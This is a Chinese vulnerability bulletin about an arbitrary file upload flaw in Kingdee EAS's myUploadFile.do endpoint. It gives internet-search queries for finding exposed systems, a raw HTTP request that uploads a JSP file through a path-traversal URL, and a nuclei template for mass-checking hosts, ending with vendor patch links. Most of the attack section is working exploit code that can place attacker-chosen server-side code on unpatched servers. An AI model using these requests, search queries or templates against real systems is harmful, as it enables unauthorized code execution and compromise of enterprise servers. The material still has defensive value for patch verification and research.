【漏洞情报 | 新】金蝶EAS myUploadFile文件上传漏洞

免责声明

文章所涉及内容，仅供安全研究与教学之用，由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。

产品简介

金蝶 EAS 及 EAS Cloud 是金蝶国际软件集团有限公司推出的一套企业级应用软件套件，旨在帮助企业实现全面的管理和业务流程优化。

漏洞描述

金蝶 EAS 及 EAS Cloud 系统的myUploadFile.do接口存在任意文件上传漏洞

影响版本

金蝶 EAS 8.0
金蝶 EAS 8.1
金蝶 EAS 8.2
金蝶 EAS 8.5
金蝶 EAS Cloud 8.6私有云
金蝶 EAS Cloud 8.6公有云
金蝶 EAS Cloud 8.6.1
金蝶 EAS Cloud 8.8

网络测绘

FOFA网络测绘搜索

title=="EAS系统登录"
app="Kingdee-EAS"

鹰图网络测绘搜索

web.title=="EAS系统登录"

漏洞复现

访问该系统会显示如图

漏洞验证POC

POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
Content-Length: 205

------WebKitFormBoundarySq4lDnabv8CwHfvx
Content-Disposition: form-data; name="myFile"; filename="test.jsp"
Content-Type: text/html

<%out.println("test");%>
------WebKitFormBoundarySq4lDnabv8CwHfvx--

响应包如下图则上传成功尝试访问上传的文件

http://127.0.0.1/easportal/buffalo/../test.jsp

nuclei批量验证POC模板

id: Kingdee-EAS-myUploadFile

info:
  name: Kingdee-EAS-myUploadFile
  author: 4Zen
  severity: high

variables:
  file_name: "{{to_lower(rand_text_alpha(6))}}.jsp"

http:
  - raw:
      - |
          POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
          Accept: */*
          Accept-Language: en
          Accept-Encoding: gzip, deflate
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
          Content-Length: 211

          ------WebKitFormBoundarySq4lDnabv8CwHfvx
          Content-Disposition: form-data; name="myFile"; filename="{{file_name}}"
          Content-Type: text/html

          <%out.println("UploadTest");%>
          ------WebKitFormBoundarySq4lDnabv8CwHfvx--

      - |
        GET /easportal/buffalo/../{{file_name}} HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "UploadTest")'
        condition: and

修复方案

升级到安全版本：https://www.kingdee.com/

根据厂商发布的安全公告，更新对应产品版本的安全加固补丁 https://vip.kingdee.com/knowledge/specialDetail/164676138713728512?category=268743209985840384&id=460728139602294272&productLineId=8